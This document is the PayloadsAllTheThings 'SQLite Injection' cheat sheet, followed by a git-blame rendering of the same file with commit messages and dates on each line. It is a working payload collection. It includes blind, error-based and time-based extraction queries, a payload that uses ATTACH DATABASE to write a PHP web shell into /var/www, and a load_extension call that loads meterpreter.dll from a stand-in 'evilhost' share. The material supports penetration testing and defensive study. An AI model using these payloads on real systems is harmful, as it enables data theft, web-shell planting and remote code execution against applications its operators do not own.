PayloadsAllTheThings/SQL Injection/SQLite Injection.md

# SQLite Injection

> SQLite Injection  is a type of security vulnerability that occurs when an attacker can insert or "inject" malicious SQL code into SQL queries executed by an SQLite database. This vulnerability arises when user inputs are integrated into SQL statements without proper sanitization or parameterization, allowing attackers to manipulate the query logic. Such injections can lead to unauthorized data access, data manipulation, and other severe security issues. 


## Summary

* [SQLite Comments](#sqlite-comments)
* [SQLite Enumeration](#sqlite-enumeration)
* [SQLite String](#sqlite-string)
    * [SQLite String Methodology](#sqlite-string-methodology)
* [SQLite Blind](#sqlite-blind)
    * [SQLite Blind Methodology](#sqlite-blind-methodology)
    * [SQLite Blind With Substring Equivalent](#sqlite-blind-with-substring-equivalent)
* [SQlite Error Based](#sqlite-error-based)
* [SQlite Time Based](#sqlite-time-based)
* [SQlite Remote Code Execution](#sqlite-remote-code-execution)
    * [Attach Database](#attach-database)
    * [Load_extension](#load_extension)
* [SQLite File Manipulation](#SQLite-file-manipulation)
    * [SQLite Read File](#SQLite-read-file)
    * [SQLite Write File](#SQLite-write-file)
* [References](#references)


## SQLite Comments

| Description         | Comment |
| ------------------- | ------- |
| Single-Line Comment | `--`    |
| Multi-Line Comment  | `/**/`  |


## SQLite Enumeration

| Description   | SQL Query |
| ------------- | ----------------------------------------- |
| DBMS version  | `select sqlite_version();`                |


## SQLite String

### SQLite String Methodology

| Description             | SQL Query                                 |
| ----------------------- | ----------------------------------------- | 
| Extract Database Structure                           | `SELECT sql FROM sqlite_schema` |
| Extract Database Structure (sqlite_version > 3.33.0) | `SELECT sql FROM sqlite_master` |
| Extract Table Name  | `SELECT tbl_name FROM sqlite_master WHERE type='table'` |
| Extract Table Name  | `SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'` |
| Extract Column Name | `SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'` |
| Extract Column Name | `SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');` |
| Extract Column Name | `SELECT MAX(sql) FROM sqlite_master WHERE tbl_name='<TABLE_NAME>'` |
| Extract Column Name | `SELECT name FROM PRAGMA_TABLE_INFO('<TABLE_NAME>')` |


## SQLite Blind

### SQLite Blind Methodology

| Description             | SQL Query                                 |
| ----------------------- | ----------------------------------------- | 
| Count Number Of Tables  | `AND (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' ) < number_of_table` | 
| Enumerating Table Name  | `AND (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0)=table_name_length_number` | 
| Extract Info            | `AND (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) > HEX('some_char')` | 
| Extract Info (order by) | `CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) = HEX('some_char') THEN <order_element_1> ELSE <order_element_2> END` | 


### SQLite Blind With Substring Equivalent

| Function    | Example                                   |
| ----------- | ----------------------------------------- | 
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)`  | 
| `SUBSTR`    | `SUBSTR('foobar', <START>, <LENGTH>)`     | 


## SQlite Error Based

```sql
AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
```


## SQlite Time Based

```sql
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
```


## SQLite Remote Code Execution

### Attach Database

```sql
ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
```

### Load_extension

:warning: This component is disabled by default.

```sql
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
```


## SQLite File Manipulation

### SQLite Read File

SQLite does not support file I/O operations by default.


### SQLite Write File

```sql
SELECT writefile('/path/to/file', column_name) FROM table_name
```


## References

* [Injecting SQLite database based application - Manish Kishan Tanwar - February 14, 2017](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)
* [SQLite Error Based Injection for Enumeration - Rio Asmara Suryadi - February 6, 2021](https://rioasmara.com/2021/02/06/sqlite-error-based-injection-for-enumeration/)
* [SQLite3 Injection Cheat sheet - Nickosaurus Hax - May 31, 2012](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			`# SQLite Injection`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00
Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00			`> SQLite Injection is a type of security vulnerability that occurs when an attacker can insert or "inject" malicious SQL code into SQL queries executed by an SQLite database. This vulnerability arises when user inputs are integrated into SQL statements without proper sanitization or parameterization, allowing attackers to manipulate the query logic. Such injections can lead to unauthorized data access, data manipulation, and other severe security issues.`


Added Summary in SQLite Injection 2019-10-29 13:52:49 +00:00			`## Summary`

Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00			`* [SQLite Comments](#sqlite-comments)`
SQL - File Manipulation and Error Based Injection 2024-11-16 17:49:01 +00:00			`* [SQLite Enumeration](#sqlite-enumeration)`
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`* [SQLite String](#sqlite-string)`
			`* [SQLite String Methodology](#sqlite-string-methodology)`
			`* [SQLite Blind](#sqlite-blind)`
			`* [SQLite Blind Methodology](#sqlite-blind-methodology)`
			`* [SQLite Blind With Substring Equivalent](#sqlite-blind-with-substring-equivalent)`
			`* [SQlite Error Based](#sqlite-error-based)`
			`* [SQlite Time Based](#sqlite-time-based)`
			`* [SQlite Remote Code Execution](#sqlite-remote-code-execution)`
References addded for SQLi, Upload, SSTI, Type Juggling 2024-11-07 19:54:16 +00:00			`* [Attach Database](#attach-database)`
			`* [Load_extension](#load_extension)`
SQL - File Manipulation and Error Based Injection 2024-11-16 17:49:01 +00:00			`* [SQLite File Manipulation](#SQLite-file-manipulation)`
			`* [SQLite Read File](#SQLite-read-file)`
			`* [SQLite Write File](#SQLite-write-file)`
Added Summary in SQLite Injection 2019-10-29 13:52:49 +00:00			`* [References](#references)`
SQL injections references updates 2024-11-03 13:06:53 +00:00

Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00			`## SQLite Comments`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL - File Manipulation and Error Based Injection 2024-11-16 17:49:01 +00:00			`\| Description \| Comment \|`
			`\| ------------------- \| ------- \|`
			\| Single-Line Comment \| `--` \|
			\| Multi-Line Comment \| `/**/` \|
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00
SQL - File Manipulation and Error Based Injection 2024-11-16 17:49:01 +00:00			`## SQLite Enumeration`

			`\| Description \| SQL Query \|`
			`\| ------------- \| ----------------------------------------- \|`
			\| DBMS version \| `select sqlite_version();` \|
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`## SQLite String`
Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`### SQLite String Methodology`
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`\| Description \| SQL Query \|`
			`\| ----------------------- \| ----------------------------------------- \|`
			\| Extract Database Structure \| `SELECT sql FROM sqlite_schema` \|
			\| Extract Database Structure (sqlite_version > 3.33.0) \| `SELECT sql FROM sqlite_master` \|
SQL - File Manipulation and Error Based Injection 2024-11-16 17:49:01 +00:00			\| Extract Table Name \| `SELECT tbl_name FROM sqlite_master WHERE type='table'` \|
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			\| Extract Table Name \| `SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'` \|
			\| Extract Column Name \| `SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'` \|
			\| Extract Column Name \| `SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');` \|
SQL - File Manipulation and Error Based Injection 2024-11-16 17:49:01 +00:00			\| Extract Column Name \| `SELECT MAX(sql) FROM sqlite_master WHERE tbl_name='<TABLE_NAME>'` \|
			\| Extract Column Name \| `SELECT name FROM PRAGMA_TABLE_INFO('<TABLE_NAME>')` \|
Update SQLite Injection.md Column names of the specified table can be more easily extracted in a better output. Tested during the CTF 2023-08-25 10:24:52 +00:00
Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`## SQLite Blind`
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`### SQLite Blind Methodology`
Markdown formatting update 2018-08-12 21:30:22 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`\| Description \| SQL Query \|`
			`\| ----------------------- \| ----------------------------------------- \|`
			\| Count Number Of Tables \| `AND (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' ) < number_of_table` \|
			\| Enumerating Table Name \| `AND (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0)=table_name_length_number` \|
			\| Extract Info \| `AND (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) > HEX('some_char')` \|
			\| Extract Info (order by) \| `CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) = HEX('some_char') THEN <order_element_1> ELSE <order_element_2> END` \|
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00
Markdown formatting update 2018-08-12 21:30:22 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`### SQLite Blind With Substring Equivalent`
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`\| Function \| Example \|`
			`\| ----------- \| ----------------------------------------- \|`
			\| `SUBSTRING` \| `SUBSTRING('foobar', <START>, <LENGTH>)` \|
			\| `SUBSTR` \| `SUBSTR('foobar', <START>, <LENGTH>)` \|
Boolean - Extract info (order by) 2022-08-13 04:22:54 +00:00

MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`## SQlite Error Based`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
Update SQLite Injection.md 2022-09-07 12:02:38 +00:00			`AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			```
Boolean - Extract info (order by) 2022-08-13 04:22:54 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00
			`## SQlite Time Based`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
			`AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))`
SQL - File Manipulation and Error Based Injection 2024-11-16 17:49:01 +00:00			`AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			```
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00
Update SQLite Injection.md 2022-09-07 12:02:38 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`## SQLite Remote Code Execution`
References addded for SQLi, Upload, SSTI, Type Juggling 2024-11-07 19:54:16 +00:00
			`### Attach Database`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQLmap tips + Active Directory attacks + SQLite injections 2018-03-12 08:17:31 +00:00			`ATTACH DATABASE '/var/www/lol.php' AS lol;`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			`CREATE TABLE lol.pwn (dataz text);`
Single quotes are messing with the command. 2022-05-15 11:53:50 +00:00			`INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			```

References addded for SQLi, Upload, SSTI, Type Juggling 2024-11-07 19:54:16 +00:00			`### Load_extension`
Markdown formatting update 2018-08-12 21:30:22 +00:00
MSSQL, OracleSQL, PostgreSQL Substring Equivalent 2024-11-16 14:35:43 +00:00			`:warning: This component is disabled by default.`

SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			`UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--`
			```
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00
SQL - File Manipulation and Error Based Injection 2024-11-16 17:49:01 +00:00			`## SQLite File Manipulation`

			`### SQLite Read File`

			`SQLite does not support file I/O operations by default.`


			`### SQLite Write File`

			```sql
			`SELECT writefile('/path/to/file', column_name) FROM table_name`
			```

SQL injections references updates 2024-11-03 13:06:53 +00:00
Adding references sectio 2018-12-24 14:02:50 +00:00			`## References`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL injections references updates 2024-11-03 13:06:53 +00:00			`* [Injecting SQLite database based application - Manish Kishan Tanwar - February 14, 2017](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)`
			`* [SQLite Error Based Injection for Enumeration - Rio Asmara Suryadi - February 6, 2021](https://rioasmara.com/2021/02/06/sqlite-error-based-injection-for-enumeration/)`
			`* [SQLite3 Injection Cheat sheet - Nickosaurus Hax - May 31, 2012](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)`